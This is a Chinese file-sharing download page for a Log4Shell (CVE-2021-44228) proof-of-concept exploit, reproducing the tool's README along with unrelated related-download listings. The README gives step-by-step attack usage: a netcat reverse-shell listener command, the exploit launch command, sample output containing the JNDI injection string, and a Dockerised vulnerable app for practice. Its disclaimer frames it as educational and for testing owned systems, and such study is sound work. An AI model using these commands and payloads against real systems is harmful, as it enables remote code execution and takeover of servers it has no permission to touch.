log4j-shell-poc-main

  • a1098346640
    了解作者
  • Python
    开发工具
  • 38.6MB
    文件大小
  • zip
    文件格式
  • 0
    收藏次数
  • 5 积分
    下载积分
  • 0
    下载次数
  • 2022-05-28 19:35
    上传日期
如标题:log4j-shell-poc-main As a PoC we have created a python file that automates the process. Requirements: pip install -r requirements.txt Usage: Start a netcat listener to accept reverse shell connection. nc -lvnp 9001 Launch the exploit. Note: For this to work, the extracted java archive has to be named: jdk1.8.0_20, and be in the same directory. $ python3 poc.py --userip localhost --webport 8000 --lport 9001 [!] CVE: CVE-2021-44228 [!] Github repo: https://github.com/kozmer/log4j-shell-poc [+] Exploit java class created success [+] Setting up fake LDAP server [+] Send me: ${jndi:ldap://localhost:1389/a} Listening on 0.0.0.0:1389 This script will setup the HTTP server and the LDAP server for you, and it will also create the payload that you can use to paste into the vulnerable parameter. After this, if everything went well, you should get a shell on the lport.
log4j-shell-poc-main.zip
内容介绍
# log4j-shell-poc A Proof-Of-Concept for the recently found CVE-2021-44228 vulnerability. <br><br> Recently there was a new vulnerability in log4j, a java logging library that is very widely used in the likes of elasticsearch, minecraft and numerous others. In this repository we have made and example vulnerable application and proof-of-concept (POC) exploit of it. A video showing the exploitation process ---------------------------------------- Vuln Web App: https://user-images.githubusercontent.com/87979263/146113359-20663eaa-555d-4d60-828d-a7f769ebd266.mp4 <br> Ghidra (Old script): https://user-images.githubusercontent.com/87979263/145728478-b4686da9-17d0-4511-be74-c6e6fff97740.mp4 <br> Minecraft PoC (Old script): https://user-images.githubusercontent.com/87979263/145681727-2bfd9884-a3e6-45dd-92e2-a624f29a8863.mp4 Proof-of-concept (POC) ---------------------- As a PoC we have created a python file that automates the process. #### Requirements: ```bash pip install -r requirements.txt ``` #### Usage: * Start a netcat listener to accept reverse shell connection.<br> ```py nc -lvnp 9001 ``` * Launch the exploit.<br> **Note:** For this to work, the extracted java archive has to be named: `jdk1.8.0_20`, and be in the same directory. ```py $ python3 poc.py --userip localhost --webport 8000 --lport 9001 [!] CVE: CVE-2021-44228 [!] Github repo: https://github.com/kozmer/log4j-shell-poc [+] Exploit java class created success [+] Setting up fake LDAP server [+] Send me: ${jndi:ldap://localhost:1389/a} Listening on 0.0.0.0:1389 ``` This script will setup the HTTP server and the LDAP server for you, and it will also create the payload that you can use to paste into the vulnerable parameter. After this, if everything went well, you should get a shell on the lport. <br> Our vulnerable application -------------------------- We have added a Dockerfile with the vulnerable webapp. You can use this by following the steps below: ```c 1: docker build -t log4j-shell-poc . 2: docker run --network host log4j-shell-poc ``` Once it is running, you can access it on localhost:8080 If you would like to further develop the project you can use Intellij IDE which we used to develop the project. We have also included a `.idea` folder where we have configuration files which make the job a bit easier. You can probably also use other IDE's too. <br> Getting the Java version. -------------------------------------- At the time of creating the exploit we were unsure of exactly which versions of java work and which don't so chose to work with one of the earliest versions of java 8: `java-8u20`. Oracle thankfully provides an archive for all previous java versions:<br> [https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html](https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html).<br> Scroll down to `8u20` and download the appropriate files for your operating system and hardware. ![Screenshot from 2021-12-11 00-09-25](https://user-images.githubusercontent.com/46561460/145655967-b5808b9f-d919-476f-9cbc-ed9eaff51585.png) **Note:** You do need to make an account to be able to download the package. Once you have downloaded and extracted the archive, you can find `java` and a few related binaries in `jdk1.8.0_20/bin`.<br> **Note:** Please make sure to extract the jdk folder into this repository with the same name in order for it to work. ``` ❯ tar -xf jdk-8u20-linux-x64.tar.gz ❯ ./jdk1.8.0_20/bin/java -version java version "1.8.0_20" Java(TM) SE Runtime Environment (build 1.8.0_20-b26) Java HotSpot(TM) 64-Bit Server VM (build 25.20-b23, mixed mode) ``` Disclaimer ---------- This repository is not intended to be a one-click exploit to CVE-2021-44228. The purpose of this project is to help people learn about this awesome vulnerability, and perhaps test their own applications (however there are better applications for this purpose, ei: [https://log4shell.tools/](https://log4shell.tools/)). Our team will not aid, or endorse any use of this exploit for malicious activity, thus if you ask for help you may be required to provide us with proof that you either own the target service or you have permissions to pentest on it.
评论
    相关推荐
    • BV01.rar
      流分类算法中的一种,Scalable Packet Classification 非常有参考价值。。
    • Modelling_the_dynamics_of_log_domain_circuits.rar
      Log-domain fi lters are an intriguing form of externally linear, internally nonlinear current-mode circuits, in which a compression stage is fi rst used to convert the input currents to the...
    • PAPER4.rar
      The Curvelet Transform for Image Denoising
    • solr在Tomcat中的部署.zip
      把server/resources/目录下的log4j.properties,复制到solr7的WEB-INF/,要创建一个classes的目录。(此处solr7.7.1中不存在log4j.properties文件夹,文件资源从7.3.0中获取。) 在E盘中新建文件夹solr7Home, 将solr...
    • c#j教案.rar
      绝对合你口味的适合初 中级程序员 快下啊
    • RC4密码算法测试代码
      RC4密码算法测试代码
    • matlab基于log算子代码-MatlabAutoDiff:用运算符重载和稀疏雅各布斯实现的前向自动微分的Matlab实现
      matlab基于log算子代码目标 该项目基于运算符重载实现了Matlab / Octave前向自动微分方法()。 这不提供后向模式或高阶导数。 它可以精确有效地计算函数的雅可比行列。 这与数值微分(又称有限差分)形成鲜明对比,...
    • p4-shape_contexts.pdf.zip
      作者提出了一种新的测量形状间相似性的方法,并将其用于目标识别。
    • shapecontext.zip
      计算两点集每个点的上下文信息(对图像计算SC的时候,需要先提取图像的内外部轮廓) 计算两点集每两个点之间的cost值,即开销值 使用匈牙利算法统计出总体cost值最低的一组点集对应关系
    • libiconv-1.1.tar.gz
      字符集转换程序